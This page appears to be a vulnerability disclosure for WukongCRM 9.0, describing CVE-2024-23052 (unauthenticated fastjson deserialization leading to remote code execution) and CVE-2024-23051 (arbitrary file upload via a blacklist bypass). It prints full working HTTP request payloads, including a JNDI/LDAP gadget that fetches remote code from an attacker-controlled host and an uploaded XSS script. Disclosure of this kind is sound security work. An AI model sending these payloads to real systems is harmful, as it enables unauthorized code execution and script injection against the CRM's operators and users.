Skip to content

Latest commit

 

History

History
140 lines (75 loc) · 4.97 KB

WukongCRM_9.0.md

File metadata and controls

140 lines (75 loc) · 4.97 KB
Raw

Project

Address: WukongCRM-9.0-JAVA

Version: 72crm_9.0.1_20191202

1.Remote code execution vulnerability

CVE-2024-23052

In version 72crm_9.0.1_20191202, insecure components are used, which causes potential remote command execution. Attackers can directly attack the system without authorization.

An insecure version of the fastjson component was used. 1704868475775 First we found a vulnerability trigger :

http://localhost:8080/CrmCustomer/queryPageList

The construction method of BasePageRequest is called for processing. In the process of processing, the parseObject() method of fastjson is first called to parse the json string into a java bean. Due to the deserialization vulnerability of this version of fastjson, Attackers just visit: / CrmCustomer/queryPageList, and enter the malicious json string, can trigger a loophole. 1704868558336 There are many attack modes in version 1.2.54, and only one of them is shown below:

This attack requires the xbean jar package to be introduced and AutoType to be enabled 1704868582627 1704868589487 Start the attack 1704868744804 Due to some problems in the authentication logic, the attacker does not even need Admin-Token, and directly launches attacks without authorization. 1704868628296 Payload :

POST /CrmCustomer/queryPageList HTTP/1.1
Host: localhost:8080
Content-Length: 115
Content-Type: application/json;charset=UTF-8
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Connection: close

{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"ldap://ip:port/Basic/Command/calc"}"

2. Arbitrary file upload vulnerability

CVE-2024-23051

Vulnerability location: http://localhost:8080/sysConfig/setSysConfig

Call the setSysConfig()->upload() method to upload the file

ee5c2034fb13a0b1e8538451c13b2a0 ef72d6ef56e5cf891bf458116698aa8 Here, script files such as jsp are simply blacklisted, so we can use some bypass techniques to achieve the effect of arbitrary file upload Payload :

POST /sysConfig/setSysConfig HTTP/1.1
Host: localhost:8080
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHGXctR7zHEGx8K25
Admin-Token: 5de65397365d43cb8a95a1a5ef176371
Connection: close
Content-Length: 301

------WebKitFormBoundaryHGXctR7zHEGx8K25
Content-Disposition: form-data; name="name"

rwat
------WebKitFormBoundaryHGXctR7zHEGx8K25
Content-Disposition: form-data; name="file"; filename="hello.html"
Content-Type: image/png

<script>alert(1)</script>
------WebKitFormBoundaryHGXctR7zHEGx8K25--

GET /sysConfig/querySysConfig HTTP/1.1
Host: localhost:8080
Connection: close

First we upload a jsp file: 1704871906733

Access /sysConfig/querySysConfig interface, can view the file is uploaded successfully, If the upload is successful, the file path is returned, if not, rwat. 1704872106023

The upload folder is empty:

image

bypass attempt: 1704872278979

Return to upload path image image

Next, we try to upload an XSS malicious file image image image